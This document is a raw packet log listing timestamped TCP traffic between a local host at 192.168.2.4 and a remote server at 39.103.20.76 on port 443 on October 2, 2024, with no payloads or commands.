Oct 2, 2024 04:27:26.730109930 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.730149984 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.730155945 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.730160952 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.730205059 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.730273008 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.730313063 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.730325937 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.730329037 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.730356932 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.730375051 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.730489016 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.730539083 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.730544090 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.730549097 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.730590105 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.730598927 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.730649948 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.730658054 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.730663061 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.730717897 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.730771065 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.730825901 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.730839968 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.730844021 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.730869055 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.730870008 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.730891943 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.730895042 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.730915070 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.730923891 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.730950117 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.730952978 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.730962038 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.730984926 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.731065989 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.731112003 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.731117010 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.731122971 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.731161118 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.731170893 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.731206894 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.731224060 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.731226921 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.731255054 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.731291056 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.816363096 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.816426992 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.816428900 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.816438913 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.816481113 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.816483021 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.816493034 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.816528082 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.816529989 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.816548109 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.816551924 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.816570044 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.816591024 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.816625118 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.816698074 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.816710949 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.816756964 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.816760063 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.816766024 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.816804886 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.816848040 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.816899061 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.816941023 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.816999912 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.817003965 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.817013979 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.817054987 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.817145109 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.817184925 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.817194939 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.817198992 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.817234039 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.817241907 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.817289114 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.817290068 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.817298889 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.817339897 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.817354918 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.817408085 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.817508936 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.817549944 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.817562103 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.817564964 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.817589045 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.817596912 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.817608118 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.817635059 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.817651033 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.817713976 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.817747116 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.817768097 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.817770958 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.817794085 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.817815065 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.817858934 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.817893028 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.817908049 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.817912102 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.817944050 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.818100929 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.818136930 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.818159103 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.818162918 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.818181038 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.818188906 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.818207979 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.818211079 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.818224907 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.818234921 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.818249941 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.818253040 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.818274021 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.818279982 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.818290949 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.818295002 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.818325996 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.818335056 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.818474054 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.818516970 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.818525076 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.818528891 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.818557024 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.818567038 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.818572044 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.818607092 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.818608999 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.818619013 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.818658113 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.818660021 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.818667889 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.818701982 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.826719999 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.903819084 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.903879881 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.903881073 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.903891087 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.903930902 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.904058933 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.904105902 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.904115915 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.904164076 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.904169083 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.904172897 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.904202938 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.904213905 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.904217958 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.904247046 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.904262066 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.904325008 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.904361963 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.904366016 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.904375076 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.904418945 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.904419899 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.904431105 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.904493093 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.904520988 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.904577971 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.904694080 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.904736042 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.904764891 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.904769897 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.904782057 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.904819012 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.904886961 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.904927015 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.904934883 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.904937983 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.904975891 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.905021906 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.905056953 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.905073881 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.905083895 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.905092955 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.905096054 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.905137062 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.905142069 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.905158043 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.905184984 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.905189037 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.905196905 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.905198097 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.905234098 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.905237913 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.905249119 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.905282974 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.905291080 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.905353069 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.905390024 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.905424118 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.905428886 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.905440092 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.905459881 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.905539989 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.905580997 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.905592918 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.905596972 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.905637026 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.905735016 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.905788898 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.905885935 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.905925035 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.905935049 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.905939102 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.905973911 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.905981064 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.905985117 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.906027079 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.906028986 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.906039000 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.906076908 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.906084061 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.906086922 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.906094074 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.906132936 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.906140089 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.906186104 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.906188011 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.906194925 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.906234980 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.991353989 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.991413116 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.991419077 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.991427898 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.991472960 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.991549015 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.991591930 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.991601944 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.991605997 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.991650105 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.991652012 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.991663933 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.991712093 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.991837025 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.991887093 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.991889000 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.991895914 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.991931915 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.991935015 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.991952896 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.991991043 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.992007017 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.992011070 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.992042065 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.992043018 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.992059946 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.992063999 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.992094994 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.992110014 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.992235899 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.992290974 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.992291927 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.992300987 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.992338896 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.992347956 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.992352009 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.992379904 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.992388964 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.992393017 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.992428064 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.992455959 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.992502928 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.992518902 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.992522955 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.992548943 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.992549896 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.992571115 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.992573977 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.992590904 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.992619991 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.992623091 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.992630959 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.992675066 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.992685080 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.992729902 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.992834091 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.992871046 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.992896080 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.992899895 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.992927074 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.992944956 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.992995977 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.993057013 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.993100882 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.993150949 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.993151903 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.993161917 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.993200064 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.993249893 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.993304968 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.993313074 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.993319035 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.993344069 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.993357897 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.993361950 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.993388891 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.993402004 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.993526936 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.993566990 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.993577003 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.993581057 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.993608952 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.993618011 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.993622065 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.993657112 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:26.993659019 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.993669987 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:26.993710995 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.024900913 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.078882933 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.078936100 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.078938961 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.078948975 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.078977108 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.078996897 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.079006910 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.079056025 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.079169989 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.079215050 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.079216957 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.079226971 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.079265118 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.079265118 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.079274893 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.079317093 CEST	49738	443	192.168.2.4	39.103.20.76
Oct 2, 2024 04:27:27.079401016 CEST	443	49738	39.103.20.76	192.168.2.4
Oct 2, 2024 04:27:27.079440117 CEST	443	49738	39.103.20.76	192.168.2.4
